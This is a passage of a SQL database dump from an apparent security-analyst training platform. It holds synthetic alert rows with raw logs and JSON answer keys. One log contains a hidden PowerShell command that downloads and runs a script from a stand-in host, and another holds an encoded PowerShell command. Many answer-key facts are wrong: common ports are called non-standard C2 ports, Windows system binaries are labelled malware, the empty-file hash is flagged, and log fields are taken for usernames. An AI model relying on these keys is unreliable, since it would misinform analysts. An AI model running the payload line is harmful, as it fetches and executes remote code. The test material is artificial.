SET FOREIGN_KEY_CHECKS = 0; -- phpMyAdmin SQL Dump -- version 5.2.1 -- https://www.phpmyadmin.net/ -- -- Host: localhost:3306 -- Generation Time: Jan 11, 2026 at 06:17 PM -- Server version: 10.6.23-MariaDB-cll-lve -- PHP Version: 8.3.14 SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; START TRANSACTION; SET time_zone = "+00:00"; /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8mb4 */; -- -- Database: `infosecl_platform` -- -- -------------------------------------------------------- -- -- Table structure for table `alerts` -- DROP TABLE IF EXISTS `alerts`; CREATE TABLE `alerts` ( `id` int(11) NOT NULL, `title` varchar(255) NOT NULL, `severity` enum('low','medium','high','critical') NOT NULL, `source` varchar(255) DEFAULT NULL, `details` text DEFAULT NULL, `alert_type` varchar(100) DEFAULT NULL, `mitre_technique` varchar(100) DEFAULT NULL, `real_world_example` tinyint(1) DEFAULT 0, `status` varchar(50) DEFAULT 'new', `assigned_to` int(11) DEFAULT NULL, `raw_log` text DEFAULT NULL, `created_at` timestamp NULL DEFAULT current_timestamp(), `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(), `playbook_solution` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, `difficulty` varchar(50) DEFAULT 'Beginner', `path_code` varchar(20) DEFAULT NULL, `min_level` int(11) DEFAULT 1, `is_ai_generated` tinyint(1) DEFAULT 0, `sector_code` varchar(50) DEFAULT NULL ) ; -- -- Dumping data for table `alerts` -- INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (166, 'Unauthorized Access Attempt Detected on Company Database', 'high', 'AWS CloudTrail', 'A suspicious login attempt was detected on the company\'s AWS RDS instance, likely indicating a brute force attack. Attackers often attempt multiple logins in a short period of time to guess passwords. Example citation: The 2017 MongoDB ransom attacks where attackers accessed databases using weak passwords.', 'Brute Force', 'T1110', 1, 'investigating', 44, '{\"eventVersion\":\"1.07\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AWS:123456789012:user/JohnDoe\",\"arn\":\"arn:aws:iam::123456789012:user/UnauthorizedAccessUser\",\"accountId\":\"123456789012\",\"userName\":\"UnauthorizedAccessUser\"},\"eventTime\":\"2023-11-06T19:37:18Z\",\"eventSource\":\"rds.amazonaws.com\",\"eventName\":\"LoginAttempt\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"203.0.113.42\",\"userAgent\":\"aws-sdk-java/1.11.792 Linux/5.4.0-1029-aws OpenJDK_64-Bit_Server_VM/11.0.10+9-LTS java/11.0.10\",\"requestParameters\":{\"dBInstanceIdentifier\":\"companydb\",\"masterUserName\":\"admin\"},\"responseElements\":null,\"additionalEventData\":{\"LoginStatus\":\"Failed\",\"FailureReason\":\"IncorrectPassword\"},\"requestID\":\"cd06a8b5-73e4-11e6-8b77-6b1937429304\",\"eventID\":\"1ae7e6c5-d901-4e48-b333-bb2d555766ef\",\"readOnly\":false,\"resources\":[{\"ARN\":\"arn:aws:rds:us-west-2:123456789012:db:companydb\",\"accountId\":\"123456789012\",\"type\":\"AWS::RDS::DBInstance\"}],\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}', '2025-12-27 15:57:46', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.42 reported 211 times for malicious activity. Abuse confidence score: 99%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"123456789012\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"UnauthorizedAccessUser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"Failed\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_6\",\"type\":\"geolocation\",\"value\":\"us-west-2\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from us-west-2 - unusual location for this user\'s typical access pattern.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'NULL', 1, 0, NULL), (216, 'Suspicious PowerShell Execution Detected', 'high', 'process', 'A potentially malicious PowerShell script execution was detected. The script attempted to bypass execution policies and downloaded dangerous payloads.', 'exec_anomaly', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2023-10-29T14:32:45Z\",\"host\":\"workstation123.company.local\",\"user\":{\"username\":\"jdoe\",\"domain\":\"company\"},\"process\":{\"name\":\"powershell.exe\",\"pid\":3489,\"cmdline\":\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.example.com/payload.ps1\')\",\"file_hash\":{\"sha256\":\"d41d8cd98f00b204e9800998ecf8427e\"}},\"network\":{\"src_ip\":\"192.168.1.105\",\"dest_ip\":\"198.51.100.22\"},\"alert_triggered\":true,\"tags\":[\"scripting\",\"execution_policy_bypass\"]}', '2025-12-23 05:51:29', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.105 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 198.51.100.22 reported 599 times for malicious activity. Abuse confidence score: 94%.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"workstation123.company.local\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"50/94 security vendors flagged this domain as malicious.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"60/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates malware/C2 activity; Alert type indicates suspicious script execution\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS'), (217, 'Suspicious Remote Login Attempt Detected', 'high', 'Windows Security Log', 'A remote login attempt was detected from a suspicious IP address. This matches known brute force attack patterns. Refer to CVE-2019-0708 for similar incidents of brute forcing over remote desktop services.', 'Brute Force', 'T1110', 1, 'investigating', NULL, '{\"ProviderName\":\"Microsoft-Windows-Security-Auditing\",\"EventID\":4625,\"Level\":\"Warning\",\"Category\":\"Logon\",\"TimeCreated\":\"2023-10-05T21:34:22Z\",\"EventRecordID\":87654321,\"RemoteIP\":\"203.0.113.45\",\"User\":\"NotAvailable\",\"WorkstationName\":\"RDP-SERVER\",\"FailureReason\":\"Unknown user name or bad password\",\"LogonType\":3,\"LogonProcessName\":\"Advapi\",\"AuthenticationPackageName\":\"Negotiate\",\"ServiceName\":\"RDP/RDGateway\",\"ProcessID\":680,\"SubStatus\":\"0xC000006A\",\"NetworkAccountName\":\"Guest\",\"NetworkAccountDomain\":\"LOCAL\",\"WorkstationUniqueId\":\"uuid-123e4567-e89b-12d3-a456-426614174000\"}', '2026-01-06 12:54:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.45 reported 165 times for malicious activity. Abuse confidence score: 76%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"NotAvailable\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"Guest\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"LOCAL\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS'), (218, 'Unauthorized Access to Admin Panel', 'high', 'web_application', 'A user attempted to access the admin panel without appropriate credentials.', 'unauthorized_access', 'T1078.001', 1, 'New', NULL, '{\"timestamp\":\"2023-10-12T15:34:59Z\",\"event_id\":\"WEB-302\",\"user_id\":\"guest_user\",\"ip_address\":\"192.168.1.100\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\",\"request_method\":\"POST\",\"requested_url\":\"/admin\",\"response_code\":403,\"message\":\"Access denied. User lacks permission for admin panel access.\"}', '2025-12-24 08:36:25', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.100 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"guest_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'NULL', 1, 0, NULL), (219, 'Suspicious File Download Detected', 'medium', 'network', 'A large file containing executable code was downloaded from an untrusted source.', 'malware_distribution', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2023-10-12T12:24:11Z\",\"event_id\":\"NET-917\",\"src_ip\":\"172.16.0.5\",\"dest_ip\":\"138.68.45.114\",\"protocol\":\"HTTP\",\"url\":\"http://suspicious-domain.com/malicious.exe\",\"file_size_bytes\":10485760,\"http_method\":\"GET\",\"status_code\":200,\"content_type\":\"application/x-msdownload\",\"message\":\"File downloaded from a blacklisted domain.\"}', '2025-12-23 18:34:09', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"172.16.0.5 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"138.68.45.114\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP 138.68.45.114 has 0% abuse confidence score. Located in corporate network range.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"suspicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"0/94 security vendors flagged this domain. Registered for 5+ years.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://suspicious-domain.com/malicious.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan.io\",\"verdict\":\"clean\",\"details\":\"URL belongs to legitimate service with valid SSL certificate.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"\"}', 'Beginner', 'EDR', 1, 0, 'TECH'), (220, 'Unusual Process Execution Detected', 'critical', 'process', 'A rarely used system utility was executed with suspicious command-line parameters.', 'execution', 'T1569.002', 0, 'New', NULL, '{\"timestamp\":\"2023-10-12T08:45:22Z\",\"event_id\":\"PROC-401\",\"process_name\":\"wmic.exe\",\"cmdline\":\"wmic process get brief /format:list\",\"user_name\":\"local_user\",\"file_hash\":\"3d9f8714f786045de44f7286d534234a\",\"parent_process\":\"cmd.exe\",\"execution_path\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\\",\"message\":\"WMI script executed, potentially collecting sensitive information.\"}', '2025-12-24 03:44:22', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"local_user\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3d9f8714f786045de44f7286d534234a\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"59/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"wmic.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates suspicious script execution\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS'), (221, 'Phishing Email Detected', 'low', 'email', 'An email resembling a known trusted source was marked as phishing.', 'phishing', 'T1566', 1, 'investigating', 31, '{\"timestamp\":\"2023-10-12T11:13:47Z\",\"event_id\":\"EMAIL-203\",\"sender\":\"alerts@trustedsource.com\",\"recipient\":\"user@example.com\",\"subject\":\"Urgent: Account Verification Required!\",\"headers\":{\"from\":\"alerts@trustedsource.com\",\"to\":\"user@example.com\",\"subject\":\"Urgent: Account Verification Required!\",\"received\":\"from unknown (HELO trustedsource.com) (203.0.113.5)\"},\"attachment_name\":\"verify_account.html\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"message\":\"Email suspected of being a phishing attempt due to suspicious sending server.\"}', '2025-12-24 05:11:55', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"alerts@trustedsource.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"malicious\",\"details\":\"Sender domain is 3 days old and associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"user@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"malicious\",\"details\":\"Sender domain is 5 days old and associated with phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"60/72 security vendors identified this file as malware.\"}}],\"expected_actions\":[\"block_sender\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Alert type indicates phishing\"}', 'Beginner', 'NULL', 1, 0, NULL), (222, 'Suspicious RDP Login Attempt from Unrecognized IP', 'high', 'Windows Security Log', 'An unexplained RDP login attempt was detected from an IP not previously associated with our infrastructure. This can indicate an account compromise attempt, which is a common precursor to a ransomware attack. Reference: Microsoft Security Response Center report on RDP exploitation (CVE-2019-0708).', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"EventID\":4625,\"LogName\":\"Security\",\"SourceName\":\"Microsoft-Windows-Security-Auditing\",\"TimeGenerated\":\"2023-10-23T02:15:43.235Z\",\"EventDescription\":\"An account failed to log on.\",\"AccountName\":\"Unknown_user\",\"WorkstationName\":\"WIN-CORP-PC01\",\"IpAddress\":\"198.51.100.42\",\"IpPort\":\"3389\",\"LogonType\":\"10\",\"FailureReason\":\"Unknown user name or bad password.\",\"SubStatus\":\"0xC000006A\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"TargetDomainName\":\"CORP\",\"TargetUserName\":\"unknown_user\",\"TargetDomainSid\":\"S-1-5-21-1234567890-2345678901-3456789012-1001\"}', '2025-12-24 05:00:06', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 198.51.100.42 reported 446 times for malicious activity. Abuse confidence score: 95%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"Unknown_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"unknown_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS'), (223, 'Unauthorized Remote Access Attempt Detected', 'high', 'network', 'Multiple failed login attempts were detected from a foreign IP address attempting to access the SSH service.', 'Brute Force Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2023-10-28T14:15:22Z\",\"src_ip\":\"203.0.113.42\",\"dest_ip\":\"192.168.1.20\",\"dest_port\":22,\"protocol\":\"TCP\",\"event_type\":\"connection_attempt\",\"login_attempts\":20,\"success_attempts\":0,\"usernames_tried\":[\"admin\",\"root\",\"test\"],\"geo_location\":\"Country: Unknown, Region: Unknown\",\"firewall_status\":\"BLOCKED\",\"alert_generated_by\":\"intrusion_detection_system\"}', '2025-12-24 05:59:21', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.42 reported 359 times for malicious activity. Abuse confidence score: 91%.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.20 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_3\",\"type\":\"geolocation\",\"value\":\"Country: Unknown, Region: Unknown\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from Country: Unknown, Region: Unknown - unusual location for this user\'s typical access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"port\",\"value\":\"22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 22 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High/Critical severity level; 20 failed login attempts detected\"}', 'Intermediate', 'NDR', 1, 0, 'OT_ICS'), (224, 'Suspicious PowerShell Script Execution Detected', 'high', 'endpoint', 'A PowerShell script was executed which is known for its use in information gathering and potential lateral movement.', 'process', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2023-11-04T13:45:23Z\",\"hostname\":\"WIN-3HT955Q9JL1\",\"username\":\"jdoe\",\"process_id\":1476,\"process_name\":\"powershell.exe\",\"parent_process_id\":1364,\"parent_process_name\":\"explorer.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"cmdline\":\"powershell.exe -nop -w hidden -enc UABvAHcAZQByAFMAagBiAGwAZQBjAHQAIABTAHgAbwBvAGwAQgBpAG4AYgBvAGsALwBnAG8A\",\"network_activity\":{\"outbound_ip_connections\":[{\"dest_ip\":\"192.168.1.102\",\"dest_port\":80,\"protocol\":\"TCP\"},{\"dest_ip\":\"45.76.23.49\",\"dest_port\":443,\"protocol\":\"TCP\"}]},\"suspicious_indicators\":[\"EncodedCommand\",\"Network connection to uncommon destination\"]}', '2025-12-24 05:09:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.102 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.76.23.49\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 45.76.23.49 reported 129 times for malicious activity. Abuse confidence score: 97%.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"51/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"explorer.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}},{\"id\":\"artifact_7\",\"type\":\"port\",\"value\":\"80\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 80 commonly used by malware for C2 communication.\"}},{\"id\":\"artifact_8\",\"type\":\"port\",\"value\":\"443\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 443 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates malware/C2 activity; Alert type indicates suspicious script execution\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'), (225, 'Unauthorized Remote Access Attempt', 'high', 'network', 'Detected repeated login attempts from a suspicious IP address, potentially indicating a brute force attack.', 'Unauthorized Access', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2023-10-25T10:32:17Z\",\"event_type\":\"network\",\"src_ip\":\"203.0.113.45\",\"src_port\":44832,\"dest_ip\":\"192.168.1.10\",\"dest_port\":22,\"protocol\":\"TCP\",\"user_agent\":\"SSH-2.0-OpenSSH_7.6\",\"message\":\"Failed password for invalid user admin from 203.0.113.45 port 44832 ssh2\",\"attempt_count\":15,\"data_transferred_bytes\":524}', '2025-12-25 05:54:43', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.45 reported 216 times for malicious activity. Abuse confidence score: 81%.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.10 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_3\",\"type\":\"port\",\"value\":\"44832\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 44832 commonly used by malware for C2 communication.\"}},{\"id\":\"artifact_4\",\"type\":\"port\",\"value\":\"22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 22 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High/Critical severity level; 15 failed login attempts detected\"}', 'Intermediate', 'NDR', 1, 0, 'FINANCE'), (226, 'Unauthorized Access Attempt Detected', 'high', 'network', 'Multiple failed login attempts were detected from a foreign IP address, potentially indicating a brute force attack targeting the SSH service.', 'Unauthorized Access', 'T1110 - Brute Force', 1, 'New', NULL, '{\"timestamp\":\"2023-10-29T02:41:27Z\",\"event_type\":\"authentication_failed\",\"service\":\"SSH\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"192.168.1.10\",\"username_attempts\":[\"admin\",\"root\",\"testuser\"],\"failed_attempts_count\":15,\"alert_threshold_exceeded\":true,\"geo_location\":\"New Zealand\",\"session_id\":\"9H4F5J2K3M\",\"network_info\":{\"src_port\":58764,\"dest_port\":22,\"protocol\":\"TCP\"}}', '2025-12-25 05:07:28', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.45 reported 322 times for malicious activity. Abuse confidence score: 87%.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.10 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_3\",\"type\":\"geolocation\",\"value\":\"New Zealand\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from New Zealand - unusual location for this user\'s typical access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"port\",\"value\":\"58764\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 58764 commonly used by malware for C2 